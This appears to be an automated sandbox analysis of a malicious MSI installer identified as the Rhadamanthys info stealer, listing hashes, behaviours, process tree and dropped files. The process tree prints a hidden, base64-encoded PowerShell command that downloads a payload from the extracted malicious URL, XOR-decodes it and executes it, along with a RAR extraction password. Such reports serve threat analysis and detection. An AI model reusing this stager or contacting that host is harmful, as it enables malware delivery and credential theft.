Analysis
-
max time kernel
231s -
max time network
233s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
-
submitted
27-06-2024 00:44
General
-
Target
setup.msi
-
Size
25.2MB
-
MD5
3d87a0e5517c9a8fc4adde50bafe7c76
-
SHA1
a1ba3b688dcb9b17ed1d430f3032e2884a0565e4
-
SHA256
49dc002fa1a0a1e33621a7d9340fb7bd0ac8b9834fc5958823d1f2bed6fa5956
-
SHA512
ebadfdc465dc5c32c854931a9f8712320cfc3752e04b3fec56a1b103c6f225c1de0c6892b1cd90b362f56d38685b8d5851e2cbefdf3291f8389b5cea2e337042
-
SSDEEP
393216:f+KUUMVzPuPA9BA/UODO0HAAqC+7Rw+lK2WhAS7KdROb7xmq7IrWowIpUDV5:f+YMVD9cECbq+QWhASOdM3N7gTwx
Malware Config
Extracted
https://gotry-gotry.com/2506s.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 24 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 55 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 43 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://www.bing.com/search?q=windows%2011%20keyboard%20shortcuts%20site:microsoft.com&form=B00032&ocid=SettingsHAQ-BingIA&mkt=en-US2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb38c63cb8,0x7ffb38c63cc8,0x7ffb38c63cd83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5356 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5028 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:13⤵
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8D0724BC2649207211B6B8DB7F9A763A2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe"C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe"C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe explorer.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AZwBvAHQAcgB5AC0AZwBvAHQAcgB5AC4AYwBvAG0ALwAyADUAMAA2AHMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 18164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 18204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 18244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1896 -ip 18961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1896 -ip 18961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1896 -ip 18961⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\ATBroker.exeC:\Windows\System32\ATBroker.exe /start osk1⤵
-
C:\Windows\System32\osk.exe"C:\Windows\System32\osk.exe"2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004DC1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb1e4eab58,0x7ffb1e4eab68,0x7ffb1e4eab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4356 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4512 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Event Triggered Execution
2Accessibility Features
1Installer Packages
1Privilege Escalation
Event Triggered Execution
2Accessibility Features
1Installer Packages
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e577b8c.rbsFilesize
22KB
MD5320efff92837a6d5c83e73a403e67fbb
SHA17eb8004b822fb5b12073014ef3be63120070534b
SHA256e85e262cb9e7e72d0c2a1c1c7ae91a70de5d1fa27789e7966546e8b760c86bd3
SHA512144716d471d1737d0340feae6a3bfd5d5c4477b370c1a09886c1dab0e041c257548e3bf0fc9a1d12aa1e21256d30de36828eb1820666031e2ddcefbda734b5b7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\585535ac-e32f-4200-95eb-4eee540a530e.tmpFilesize
281KB
MD5ff2359bdc2252e49224218ad007ecb16
SHA18bafef81682129e355c0e1adf804d7b4e5c3f5f2
SHA256f889a8851ba217e33662fa912373f3c33109902c297a0f18f3835daf5dbf5d11
SHA512aeca92f428dbcde8d591e158dc47d0189ffedbdaccc19ca7a721f124401f9c8f985319051f05c1f3b226e98a31800a7dc8bd6c0d24209f41682be971507802e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD54bae4815fe57d527269780614790dc53
SHA12d339f8e1318fe7997e1ad967ecdaa8f30f9f54b
SHA2561a9addd9e50a430a2490ddc23961128b6795f08366b643d47f50ae5c4fd3553b
SHA512ebddd637aa614664be31eb1a2989b3fcf3955b57be89be516c19c3efdb93b9458a66388967bc3be26d0e8b75501343c6f164ca201cc180246c5297c50c568a55
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD5f839fc14286e670f18f191b5d60071e1
SHA177858687c31bfd1dc536319939db1bdfe45c7de8
SHA25660ae6a6101369f4feb6c505cb730cbc7f3445dc21acb2831f9063b9eeb5f39f0
SHA5125e5969115224fcc284bdbe64243fd2025b6864918b5222e3d90ae3976b6626be5ad05f68b19a1d1b2d0aa6d92bb1eaa3f92cc15ec99c211041fc0a1c0fec1228
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD52904edfb1359d14bddd443b0ff6abe7b
SHA1a99cf1df0539c2fddd431a7e26c806cd53288e7d
SHA256bf7def095492062a9e33f6227c21bcf34e7c9b6101c762bc768ff21f109dd950
SHA5127d2833bea1a92e43551c89a5c29a3386cff2ca7381c9b70e3e31aa9fc15155ff45deef89aab75d04b494939135f4a54ee7016306402a48d06d310b99f367d5ed
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD56baf3d11062b6c240b20ffe12398a045
SHA15bcf0dce49c59beac77c8a5e9d3f87172ba824e4
SHA256e2b1bf327253208670a4bdb4dcd9a6fe3217d881bc3a1e504a082c36f19c5294
SHA512ad6f01b2bef29c83fcfb109c7ebf57bcba97c07a14cbdc29bed1bd7c7b4de70cbbf69c8e282f705a5a37b0a87d626bc46aa5d26e4f508dcd71f0a6a210d2ca92
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5a74887034b3a720c50e557d5b1c790bf
SHA1fb245478258648a65aa189b967590eef6fb167be
SHA256f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250
SHA512888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD564f055a833e60505264595e7edbf62f6
SHA1dad32ce325006c1d094b7c07550aca28a8dac890
SHA2567172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99
SHA51286644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002Filesize
42KB
MD5f7189700993d4198ee96bd6af5569539
SHA11ad2e11bb23ac04c9eebba69fe755fb27fcda164
SHA2562447d53bd765b1f2c752ffda92b6f9a1dcabda1e4edc4d7496797f6cefdebf23
SHA5123b5522068842502f5f6dcb6678248746eabdcdeb25e21d21fb0c9e446b75eb97077f15be7ca8e5b04abd4094bc7cc8ac8452c74a946d369614ee4e77a91753b5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD51a808ff2bacdf9394dd940e2dfc195fb
SHA12f85130ca23bc1c3a5c4d91b990b1ec718c9801e
SHA2563896106fb49253fd46bd32ae262d0d6b56096116f0f3458ae56198a5299a932f
SHA5122310fefb4a2f0783b7ec4cc042e674b4e82dae76966df6c591c90e2ac0ebdcc8b2160a85c40d8e79326647100ae72c91fcd709cb629a3c18c742c627ea50a30c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
764B
MD51e2f1192bb5150f9525640bff75a053a
SHA18a12cf548c4e32af30e416eb3c97f95e465868ab
SHA256836b323f070c4c7c667bd0d02613385acbb8d7aaa31f4536633ef69ff25d82b3
SHA512b41a953e998ead0df9002a9149a17e924ed1ec3896bca3f4063e1c7732ac3aea5ab07ea0605fed4cf7f973c10eb007a37eecb5db1dfa0cbbdb91d76b29056f2e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD556c7aeab1c0a379009d134bd6563a0e9
SHA1f1f2d97458d6409c293d17bd4d48cb2b9c5396c3
SHA256f13708a48fba65a921855382621a5f2e4960566459a6396728d82dccbf216428
SHA51254c36115f0ba37caf5af75cf0239672f66bf113982ff9c47ee2ec88be978cb54164e94529be319075dbef7b0e698c3871c118d526f3585e0d78dace3925d50cc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5161ea1e5ea613d78ec3ddff2c82efc8f
SHA1d47588a27b945630ea8724829aa1935fc49a58ab
SHA2567ef406720866e48ad958bc4d51bfa0c4f8a27656954db532a15f99161e2bcd4f
SHA512b70f56a08a44308d1f7de0ac8d94d29301137aa3030a0b089ade49c8b0a62bbcf063043a8505dd382174330ccbf1a8734d71f839121fbe9e6494696686240b21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD54349994a1bd73fb86adc74b0e9ceabd1
SHA1d08c84d55d1b7b56095066f5a953e644ac4b9485
